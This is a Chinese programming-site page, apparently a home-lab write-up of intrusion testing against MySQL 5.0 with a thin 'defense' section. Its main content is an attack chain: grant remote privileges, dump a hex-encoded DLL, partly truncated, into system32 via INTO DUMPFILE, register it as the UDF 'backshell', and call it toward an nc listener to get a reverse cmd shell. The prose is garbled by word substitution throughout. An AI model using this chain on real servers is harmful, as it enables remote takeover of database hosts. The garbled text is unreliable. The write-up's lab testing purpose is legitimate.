程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> MySQL綜合教程 >> mysql5.0入侵測試和防備辦法分享

mysql5.0入侵測試和防備辦法分享

編輯:MySQL綜合教程

mysql5.0入侵測試和防備辦法分享。本站提示廣大學習愛好者:(mysql5.0入侵測試和防備辦法分享)文章只能為提供參考,不一定能成為您想要的結果。以下是mysql5.0入侵測試和防備辦法分享正文


在做了之前的SQL SERVER以後,便很想測驗考試一下MYSQL的入侵測試曾經防備,與年夜家一路分享。
總的來講,我一向在用的是MYSQL,對MYSQL比擬熟習,比擬較而言,感到MYSQL更平安,這只是我本身胡亂料想的,願望不要惹起甚麼爭辯神馬的。。。一本饅頭激發的血案。。。

正題之一

物理機:Win7
虛擬機:XP

賜與mysql長途權限:


grant all privileges on *.* to 數據庫賬號@賜與權限的IP identified by '數據庫暗碼';
flush privileges;


給物理機長途權限:

物理機勝利銜接上:

履行侵入測試前(有圖有本相):

履行侵入測試後(有圖有本相):

重啟前(有圖有本相):

重啟後(有圖有本相):

正題之二:

長途登錄以後寫入代碼,代碼在yyd.txt傍邊,然後在MySql中寫入文件:

Win7 打別的一個cmd,當地端口映照:nc -vv -l -p 端標語

虛擬機上:履行映照:select backshell("物理機IP",端標語);

這便履行了3306端口反彈CMD

(沒圖了。。。用到了一個nc軟件履行的映照)

yyd.txt年夜概內容:

et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部門代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';


正題之三:

防備

 

感到有點亂,重要是分享了兩種辦法入侵,然則防備那部門應當是XP上的MySql辦事封閉,然則早XP上做了很多多少測試,左後XP被我弄掛失落了。。。。好難看,只好把Win7上的MySql辦事拿出來了。

認為重要照樣長途銜接的成績,“假如MySql不開啟長途銜接的話我們照樣同伙”,開頑笑,假如MySql不開啟長途銜接的話入侵概率會小的許多。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved